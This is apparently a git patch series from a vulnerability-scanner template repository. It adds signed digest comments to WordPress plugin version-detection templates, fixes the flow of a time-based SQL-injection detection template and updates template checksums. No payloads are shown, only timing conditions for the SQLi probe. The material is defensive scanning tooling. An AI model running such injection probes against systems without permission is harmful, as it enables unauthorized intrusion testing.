4a0a004730450221009d10db1426ddf0a4290d5c25668148cc47362843c8910d27a542370b8349c37202203167a36a7e72143a67292db8ff1b3d4ca8b33f30a6573920ce972ed774592f63:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index 350fd9436b..6c5b73e37c 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100ade4c05b29aeb2871744564cc1e3dd8ba3bd642422128881a2313a13afcb096502206d4e4ac2679e4ef2a59d3f6e1a19b11e3aab644632c1454e95096f1d2e96f6ff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index d0dc8d92bb..61b078041f 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022070df4a4489ddab24023208726c0031363427e24604df317032163222e9034c80022100c489880692b79147b1714d03168f4044b0bd61efd1ff5ab5c6713ad4b31c6ff9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index c49bbc2b6d..520e871871 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100fe83bc598cf2d0a07fb3620d332d32bbe704df392f603647b83dc6b6a144d140022079c75b50e9a673e52a317e31e33dabc62298dd5b6c68e189abc8487d9c84b3da:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 27586cbd9d..215c092dd7 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a004830460221009bdc5757bb259d006841c2f990af07fde792eaf437fbeed8dfb54ed6afb8750f022100be421264f07ac64fe7b410d30e29d55ce739223815836b7cabdedc7cfd7ce480:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index 946272f0a9..ddae468ae0 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a0048304602210083fb43fd7ae5a751e62d9498f0045086cb6e7c32c90cc81a229180343781b23302210091d78d7639f70929fd643e374919471e772f2cf9d1bf8648a1b315128fc164eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml index aa29706872..97873633b3 100644 --- a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a00463044022066cd71fcc6194f0a9875c8bf2c316ec86b363b1ebefc47792a6ff99a600db78d022031136c8e3827192f32c41240aa7186a59eefa909975fc2b3cc1e0af623c05b56:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index 290d53ab7e..5b72a3d91e 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022048b974f8041ec9fd77d0343f437e562f87c178c13bb1600a0845e837b6316199022100ff74591dc8c0cb38829d4b79574d0710a9a6604948782985685abb11656722be:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index f7c9ef9b1f..3710d144d2 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022064b382abe6dcf5f89efbe4b26209011436c73f6882d087f011857a3e88c64cc9022100e5c175186f391745a77ca824ef4ddc0b5a388f5b2a5cc4f9b1b87251ad31b780:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index f1c16275a2..067a6619ad 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402206e8f6763aa02f424c869ee40229378d959ce28234bc787687801490f838ca5ca022039a5bde3060c3c8e20da011533b4037d4457c7ffb51849e5a0f0e5898eb06d63:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index fc072e19d8..5af9058c1c 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100b0c5d229b969c09fac55cc757dc1d72c978b253d64705592fce01b2c2f37911f022014cae9924aa6a577667729f935475c872e75bb5c88f862ffdece43123d0c86d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index da9df0e8a5..8779e79e9a 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100963547ad352627b481a0400ce82252e3d5c665692121df3e814742926ace71c3022100b94e46f4b029f145f4582ac44415639fc55847a8a571ec60ef8fae94a6a196fd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index f8113d9750..a12b238b40 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100da37405a89109d8442d1fb054964b423bd8142ff93e8635bccaeeb8f5d321cac022100b8ccc0b6ee4ca8a8b1d060a690824f8aceb18b1f39db51ba97a6dc5e92367e7c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index 5f80282ab2..d14e6cefa6 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a004730450220668f9779e4124668654d48d21566a0fbfdb5d4da9249e6aeb7c8437732635e6d022100bc7b3fcfcf07f559fdf6f32e5afd9676ae94fbf35223b8cfe89cc307beec50ff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 5725d5bb3f..6b21ecc49f 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100d0e7053bcddc2dce214fab012c796688eb0724a93afdb680f9f8299f9d3b6c14022100e3611edcb79b2834bcc67aee83a35da65914487e9388970b408efd0fbae0bc5d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index f67a8bc18a..c5acabf328 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100dd75fa27596d7c1e864eaee08ee5729326dcda2e7dd22852ac9eccd33e213060022051bdd0adf65a656d3083f2af3aca0aa5a9fe25dd0847f45992375ff004618f36:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-crontrol.yaml b/http/technologies/wordpress/plugins/wp-crontrol.yaml index a773829b7d..bb6370cba5 100644 --- a/http/technologies/wordpress/plugins/wp-crontrol.yaml +++ b/http/technologies/wordpress/plugins/wp-crontrol.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a00463044022073aa983e3b092ea3d30ff0e3d7f58622edadf1627c80d43a5528130a419839c102206f931019559a01199313aad4be00174c7791a14f4d3c87f1aa7dd6a2e7e13fea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index b9bd4be0a8..27a9cbeec1 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a004730450220706e75a1a9ccb867f25db173a0226e82793649c80cd735f699d19912f6048f0b022100cfbcd66900bcf7b591272d6c907a68843d6d3f0c3d66d87af287bbe3e449d8d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index bece4ce486..23183ddafd 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022076a648a9cb5c631a2edcc0ab433e2200564f85e02cac41803439b4b92edd4701022100ea61259770fe2064a0cb1e61615045a8c370548e540679deaf8f7b61dcaf965b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index 138b0aa9a6..a13e91002e 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402203abd57c2a27fc288e8b9085c254484f1653bcdf3d04666adb41166c2a8f19a7402203ac4dab0871c0021ccf0e1a617f7928b1e097306f0ffc51f837b8a2688864f6f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-mail-logging.yaml b/http/technologies/wordpress/plugins/wp-mail-logging.yaml index 01a3669132..fa6c5a88a7 100644 --- a/http/technologies/wordpress/plugins/wp-mail-logging.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-logging.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a00463044022070eb02cee00d235a0bb6e43c948f7de197c039410cfb7e1302c17fe66de1d0ad02207bba4d0174db2aca4e32da528d7760713cc64433c0bc740412b1925fc04cc437:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index 68bf71bc83..d662d82300 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a00463044022012cff16b4bc24430112542ced08287fb446808511c135d6c0f819f3ad2110d440220117bf5f67f2716666956ae5ba1ddbdfa30680d3a616084921e94bf3fba36ebbf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index dc18db23b1..b9ecbeff00 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a004730450221008a0e83ec2113630936b9a8f4601ab2786250229dbb0098c03c97fcd1b90aa64702202b670f410eef8f52993c3ba232bc2f707f1b919b690964660e97ba5454cf0fe8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index c3d10f0135..852f8c6672 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402207056995c60b7c108ec835ffac93b273c4ce54ef0e410661ffb380f3800705f5002203380055890afcb96a8799189baffa8bf07de6028704e7779f48a6f3af3cafe1e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index 4a8bc6b75c..fa65d09a31 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100c5845f089d9aaf0075780ee696e54d17a2ca2463de2f82859f64011a7d7543d402207341bc53fcdb5b17271143b8db048b120f648667c46ce7f649bbd1a4396118e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index d2c74355bd..0925f757c0 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402202564953aac079967a661da8afa835a306b8bb4c940684e9e1382d26f357f55b402201331f132bca4a1670bca8975c38755be711c5ee2af7f20f65ae6005b820597a3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index 94b8494b08..a55af23257 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502210099f75ae1ad384606272b4c7a06f61def098040a6f53a25e3041d57f5a9927f9102201f9fa4d1991dbe9c09478fdc3742251435bc324e9deb328e752824d762f69a40:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml index 108aba79e9..7722eb51a4 100644 --- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml +++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100cfdf3398d256a26dd7cd3d4c208a81fed95434c120b3ae60973a68a16793fa5b022100b5457602881a778e5769e4995c317c16d72e6b12e3315aeb0cef0b5562f54b09:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index f6f6bf5566..8554ae4e6b 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402207fb29ad1ae63cecc12e5e7c0d3cbd2edb2628a3e4f21cf59ca5a70ce397d158002204ea8e40f0043ec43177c8cb7836bccf97e7ad734b484aac34163c6e525d79869:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-seopress.yaml b/http/technologies/wordpress/plugins/wp-seopress.yaml index 483cb7cac7..bdbd464f11 100644 --- a/http/technologies/wordpress/plugins/wp-seopress.yaml +++ b/http/technologies/wordpress/plugins/wp-seopress.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100fe57d7650b6a2003a8937097cc3f6c2249fe28c69ad17d2512c4f087e9baf2d80220761d07bbc6a053379916bb23e8113c73da9835c03de9a18cfbc44176ecbdd070:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index a132c98df4..78cd6e6da2 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022002b23f9ced01c9753547d5e0f874e2572261c562a9708d065ca3072885715006022100ead8e413cfa12839569d55908a9fbdad7391bab4290cccf9e4e2040c7b316c38:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index 135bbee046..a69820c28e 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100b7624437b57727124f4538c8ec69e50e92fd6d91433f2e615bf9cab57b21fb6502203603cb002e2a96132d962ef246e3ac5dcb3f53b3e3036a342fa9c487e3c9009c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index 5b690d96c0..de8979593b 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a004730450221008901ae9f4f98617f359d5cb125b9bf97e002eccde2eec14d98c4a18e7b586fb502202b1ae8dcf038136e047c93739f3b6fd4a6adcd5ba4d5fc79fbb4f303d50305d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 16c7d6cff5..40881f2d6f 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a0048304602210083e152c6f93b48a6e2fc15b03c44ceee4c207e943b08bb3fccf86337f8695b29022100eb4caa086a6b63d6b2631100e370ff1b1f9ec93ed18717cf91ce05e21043461c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index ab099f357e..9e9b965044 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100c11b1c308294e7d263a203d2bcde48e9ed8c242dba3d0111bbdbbd94d904258b022100de0067ff9c4c844b92677ad76ff5fb0f4f220fc01746c4b52b69d4c34151b4e2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index ad0b8f8fed..07eb1f1b8d 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402207547f349790f2851796f6945e68077dadd14a62c46cd18e05cdf7e64b57c2cff02203bddc283480f20859233368919f2cbccb32b953072595e6928f28d36523b3898:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index aaaf0f9a17..5f226ec647 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502202ad2bb393b714b216dfa3bab996583cb074f75244c52b53328336f827edf8ff5022100985e4a4eb05d315cb17eee8aaae86d98a83230373963d67c2aacf7031c837a9c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index f943c7afeb..67eeae8cf0 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402202d319433e55c2bb817029d3d51f397cf924f6abf73ba82f4d14062a8086b234d02207501f2ef07e292ecf060a3948439ef8c3a2e1d587a83101d5b101392d1ed2f19:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index 062e5c85b4..20cfe3544d 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a004630440220748b39de423fb58a6c1bc5edb40e819acb029b810ebcc63b288da50879add9c702207f806547ca3bcf0583ed0732dadc521457c3182faed317933d11600d3d4b2f0a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index 6dcfdda117..1f2dfc0df1 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502210085fe56043dd86fa2f4324006375761a4172a6eb64bbcc5bc26554227cdd55d070220249b5dbb870c7a1231f3b25028fa105f02c199464219f6126b15f839833ba4cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From de056f58090528766c9efeaf4b563ff426682d88 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 17 Oct 2024 17:37:49 +0530 Subject: [PATCH 186/218] Fix time-based-sqli flow --- dast/vulnerabilities/sqli/time-based-sqli.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/dast/vulnerabilities/sqli/time-based-sqli.yaml b/dast/vulnerabilities/sqli/time-based-sqli.yaml index 3b7946edbf..25a72a7f08 100644 --- a/dast/vulnerabilities/sqli/time-based-sqli.yaml +++ b/dast/vulnerabilities/sqli/time-based-sqli.yaml @@ -19,6 +19,7 @@ http: - type: dsl dsl: - "duration<=7" + internal: true - raw: - | @@ -47,4 +48,4 @@ http: - type: dsl dsl: - "duration>=7 && duration <=16" -# digest: 4a0a00473045022100d675885ab7a3077f93b0db61d16c0c497b081929390f70eaf3f83176718297bc0220757a070de885db66f2a5855ee6ae327d14d04b04f0ce5cfc27db288563341cfe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d675885ab7a3077f93b0db61d16c0c497b081929390f70eaf3f83176718297bc0220757a070de885db66f2a5855ee6ae327d14d04b04f0ce5cfc27db288563341cfe:922c64590222798bb761d5b6d8e72950 From 72d755809531c31fc34a0c7fbc0c92c6f5ea043b Mon Sep 17 00:00:00 2001 From: ghost Date: Thu, 17 Oct 2024 12:15:40 +0000 Subject: [PATCH 187/218] =?UTF-8?q?chore:=20generate=20templates=20checksu?= =?UTF-8?q?m=20=F0=9F=A4=96?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- templates-checksum.txt | 406 ++++++++++++++++++++--------------------- 1 file changed, 203 insertions(+), 203 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 6d06a9041e..8d243eb645 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -63,7 +63,7 @@ cloud/aws/iam/iam-password-policy.yaml:0c0198bd8d1a51bb19a33eaca3eb0e0084ddb229 cloud/aws/iam/iam-root-mfa.yaml:5b82c6ccd615779185fd186e0a7c0455c02340fc cloud/aws/iam/iam-ssh-keys-rotation.yaml:d3bb01e0e9eba3375cee6bf5bbde2c2b629b5cd3 cloud/aws/iam/iam-unapproved-policy.yaml:883cdcaea84c6970f6f99cc3289ffc2ed85bbac1 -cloud/aws/iam/iam-user-password-change.yaml:125e3e600cb9aab43aec05161eac1d85816e42a6 +cloud/aws/iam/iam-user-password-change.yaml:af7fc040fa28a4621255bcb6f7f3ccfb6e1825df cloud/aws/iam/ssl-cert-renewal.yaml:40622e59896e04627695c6d286e0015aaed13010 cloud/aws/rds/aurora-copy-tags-snap.yaml:9d0f7c95a0e76e441aa771fc7ee6c85a0f510736 cloud/aws/rds/aurora-delete-protect.yaml:4ff1aef5f611e5bdec4248c135e99db23c8c599e @@ -439,7 +439,7 @@ dast/vulnerabilities/lfi/windows-lfi-fuzz.yaml:322e63c2fde38a3f84d349820850fc73b dast/vulnerabilities/redirect/open-redirect.yaml:2f05e6169e385b0142d95ee6918e5c0e36bc4224 dast/vulnerabilities/rfi/generic-rfi.yaml:de3d066b0dc329ffbb333def6e7f1a5a4c1d5836 dast/vulnerabilities/sqli/sqli-error-based.yaml:e4be137096c5190171b6ce4531571a828f2568ee -dast/vulnerabilities/sqli/time-based-sqli.yaml:c0bf67162953a70d11c3915a49e2a19a459b5f74 +dast/vulnerabilities/sqli/time-based-sqli.yaml:5729816d27483f6f378f1010fd235179c14b3de0 dast/vulnerabilities/ssrf/blind-ssrf.yaml:27e68a58e240f97f21f3e0be91a88253d459a830 dast/vulnerabilities/ssrf/response-ssrf.yaml:104def6ff82e4dcfc88917f98403bea903e39d79 dast/vulnerabilities/ssti/reflection-ssti.yaml:cfefbcfec9ce4e1de812f0409c4a2461a4a7b851 @@ -3762,7 +3762,7 @@ http/cves/2024/CVE-2024-32735.yaml:b6029c669edd7049a58dda3d4109055671c3b75d http/cves/2024/CVE-2024-32736.yaml:88d3a811c8d4b36873a4b3b08d176db69697df15 http/cves/2024/CVE-2024-32737.yaml:0376a9ccafd9bbe05ffd2f35f1df3db5de6d9127 http/cves/2024/CVE-2024-32738.yaml:152972f1a90f7e0fbcd2d7589de103299289a071 -http/cves/2024/CVE-2024-32739.yaml:060bdd3127ffe51653da4d88af0071995a15fb88 +http/cves/2024/CVE-2024-32739.yaml:8e16470551a1b14616febf42e6475ad957bdcf41 